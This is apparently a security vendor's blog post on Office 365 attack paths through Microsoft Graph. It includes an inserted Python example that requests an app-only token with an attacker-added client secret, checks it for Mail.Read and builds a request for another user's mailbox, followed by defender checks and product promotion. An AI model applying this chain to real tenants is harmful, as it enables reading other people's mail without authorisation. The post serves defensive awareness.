Office 365 – The Attacker Perspective

Office 365 is Microsoft's Office productivity suite delivered as software as a service.
Moving to the cloud opens new attack vectors, and those vectors ultimately allow an attacker to reach sensitive data stored in mailboxes, OneDrive, SharePoint sites, and more.

Gaining the initial foothold can be achieved from multiple techniques:

  • Password Spraying
  • Credentials stored in GitHub repositories or other publicly exposed services
  • Abusing Primary Refresh Token (PRT) SSO tokens from on-premises machines
  • Harvesting user and application credentials from on-premises machines – an attacker can collect user access tokens or application secrets/certificates from well-known locations
  • Leveraging SSRF or RCE against cloud virtual machines, for example to obtain tokens issued to the VM's identity
  • More…

Microsoft did a great job integrating the Office 365 products behind one API, Microsoft Graph. From the attacker's perspective, at least, that is great: one API can be used to attack Exchange Online, OneDrive, SharePoint Online, and more…

Once an attacker has an initial foothold in the cloud, they can, depending on the permissions of the identity they hold, abuse Azure AD (AAD) permissions to gain control of sensitive information, mailboxes, and more.

Let’s explore a few examples of how the attacker can do it.

Example 1:

The attacker compromises an AAD user holding the Global Reader role. This role can read everything a Global Administrator can see, that is, all tenant settings and administrative information across Office 365, without being able to change anything. It does not by itself open mailbox contents, but it exposes the full configuration of every mailbox in the tenant (delegated mailbox permissions, forwarding and transport rules, shared mailboxes) and of every application registration and its consented permissions. That is exactly the reconnaissance an attacker needs to pick the next target, such as an over-privileged application of the kind shown in Example 2.

Example 2:

The attacker compromises a user who is the owner of an application registration; in our example, a mail-monitoring application. Microsoft Graph lets an application be granted permissions on Office 365 services. For example, the application permission Mail.Read allows reading mail content in every Exchange Online mailbox in the tenant through the Graph API. Because the attacker owns the application, they can add a new client secret (or certificate) to it, authenticate as the application with that secret, and abuse the permission that was already consented when the monitoring application was set up. No new consent prompt is involved, and the attacker gains read access to all Exchange Online mail.
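The chain in Example 2, written out as an added example (this is not code from the original post or from XM Cyber): step 1 builds the OAuth2 client-credentials request that a newly added secret makes possible, step 2 decodes the returned access token and checks whether its roles claim carries a tenant-wide mail application permission (app-only tokens carry roles; delegated user tokens carry scp and are limited to that user's own access), and step 3 builds the Graph request for another user's mailbox. The tenant ID, application ID and secret are placeholders, and the two sample tokens are constructed, unsigned JWTs so the script runs offline.

```python
import base64
import json
from urllib.parse import urlencode

GRAPH_SCOPE = "https://graph.microsoft.com/.default"
MAIL_APP_ROLES = {"Mail.Read", "Mail.ReadWrite"}


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def token_request(tenant_id: str, client_id: str, client_secret: str):
    """Step 1: with the secret the attacker added to the application, build the
    OAuth2 client-credentials request. Returns (url, form_body); the body is
    POSTed as application/x-www-form-urlencoded."""
    url = f"https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token"
    body = urlencode({
        "client_id": client_id,
        "client_secret": client_secret,
        "scope": GRAPH_SCOPE,  # .default = every application permission already consented
        "grant_type": "client_credentials",
    })
    return url, body


def jwt_claims(token: str) -> dict:
    """Step 2: read the payload of the returned access token. The signature is
    deliberately not verified here: we inspect a token we requested ourselves,
    not one we are asked to trust."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected a compact JWS (header.payload.signature)")
    return json.loads(_b64url_decode(parts[1]))


def app_roles(token: str) -> set:
    """Application permissions appear in the 'roles' claim of an app-only token.
    A delegated (user) token carries 'scp' instead, so it yields an empty set."""
    return set(jwt_claims(token).get("roles", []))


def can_read_all_mailboxes(token: str) -> bool:
    """True when the token carries a tenant-wide mail application permission."""
    return bool(app_roles(token) & MAIL_APP_ROLES)


def messages_url(upn: str, top: int = 10) -> str:
    """Step 3: Graph request for another user's mailbox. Only succeeds with an
    app-only token for which can_read_all_mailboxes() is true."""
    return (f"https://graph.microsoft.com/v1.0/users/{upn}/messages"
            f"?$top={top}&$select=subject,from,receivedDateTime")


def make_unsigned_token(payload: dict) -> str:
    """Constructed sample token for offline use (alg=none, empty signature)."""
    header = _b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    return f"{header}.{_b64url_encode(json.dumps(payload).encode())}."


# Constructed sample tokens (placeholder values, not real Azure AD tokens).
APP_ONLY_TOKEN = make_unsigned_token({
    "aud": "https://graph.microsoft.com",
    "appid": "00000000-0000-0000-0000-000000000001",  # placeholder application ID
    "roles": ["Mail.Read"],
})
DELEGATED_TOKEN = make_unsigned_token({
    "aud": "https://graph.microsoft.com",
    "scp": "Mail.Read User.Read",
})

if __name__ == "__main__":
    url, body = token_request("contoso.onmicrosoft.com",
                              "00000000-0000-0000-0000-000000000001",
                              "<secret-added-by-attacker>")
    print(url)
    print(body)
    for name, tok in (("app-only", APP_ONLY_TOKEN), ("delegated", DELEGATED_TOKEN)):
        print(name, sorted(app_roles(tok)), can_read_all_mailboxes(tok))
    print(messages_url("ceo@contoso.com"))
```

Two checks a defender wants from the same chain: the secret addition is recorded in the Azure AD audit log as an update to the application's certificates and secrets, and an Exchange Online application access policy (New-ApplicationAccessPolicy) can restrict an application that holds Mail.Read to a defined set of mailboxes, so the application permission alone no longer means every mailbox.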

How XM Cyber Helps Organizations Manage Office 365 Risks

As we have shown, there are multiple attack vectors against Office 365 through the Graph API. To manage these risks, it is necessary to have a tool that gives you critical context about how different exposures combine into attack paths and what the consequences are if a vulnerability is successfully exploited.

At XM Cyber, we help organizations map attack vectors towards their critical assets, including highly sensitive mailboxes and critical SharePoint sites. Most importantly, we help reduce the attack surface by supplying mitigation steps for each step along the attack path. All of this is vitally important for managing the specific risks that come with using Office 365.

Minimizing Risk by Focusing on the Small Number of Exposures that Jeopardize Critical Assets

XM Cyber’s attack-centric exposure prioritization technology maps attack vectors by launching simulated attacks on an automated and continuous basis. These attacks mimic the same tactics and paths adversaries are most likely to use when targeting your crown jewel assets, allowing you to view your defenses through the eyes of an attacker. This allows you to gain deep and ongoing visibility into any emerging exposures related to Office 365.

Importantly, XM Cyber technology eliminates 99% of the risk to business-sensitive systems by focusing on the 1% of the exposures that can be exploited. Instead of using narrow metrics like CVSS scores that only deal with exposure severity, XM Cyber technology can identify which gaps are most likely to be leveraged by attackers and help defenders understand the critical attack-centric context.

XM Cyber can identify all the types of exposures that create additional attack paths and extend the attack surface. These include exploitable vulnerabilities, misconfigurations, undermanaged credentials, and legitimate user activities that can be exploited (e.g., SSH, RDP, file access).

In addition to continuously identifying new exposures and attack vectors and prioritizing the cyber risks that affect business-sensitive systems, XM Cyber also provides context-sensitive, least-effort remediation options.

In Conclusion

Office 365 is a core business application used by countless workers every day. Yet the choice to integrate all of its products behind a single API also makes it an object of great interest to attackers.

To manage these risks, we encourage you to use XM Cyber’s industry-leading attack-centric exposure prioritization platform. It is the only product on the market that provides the necessary attack-centric context to extend optimal protection to your most business-critical assets.

Zur Ulianizky is Head of Security Research at XM Cyber

